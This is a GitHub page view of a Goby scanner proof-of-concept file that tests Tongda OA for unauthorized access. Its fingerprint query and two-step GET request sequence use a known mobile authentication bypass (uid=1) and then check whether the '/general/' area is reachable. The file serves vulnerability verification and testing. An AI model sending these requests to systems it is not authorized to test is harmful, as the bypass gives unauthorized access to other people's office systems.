-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathtongdaoa_unauth.json
83 lines (83 loc) · 3.13 KB
/
tongdaoa_unauth.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
{
"Name": "通达oa未授权访问",
"Level": "2",
"Tags": [],
"GobyQuery": "app=\"TDXK-通达OA\" || body=\"通达oa\" || body=\"tongda2000\" || body=\"Office Anywhere\" || body=\"tongda\" ||product=\"TongDa-OA\"",
"Description": "通达oa未授权访问",
"Product": "通达oa",
"Homepage": "",
"Author": "",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"https://www.freebuf.com/vuls/265749.html",
"https://mp.weixin.qq.com/s/IabOKaeNyAsh8V4k2cmXAw"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "relogin",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/general/",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-02 12:09:45",
"GobyVersion": "1.8.255"
}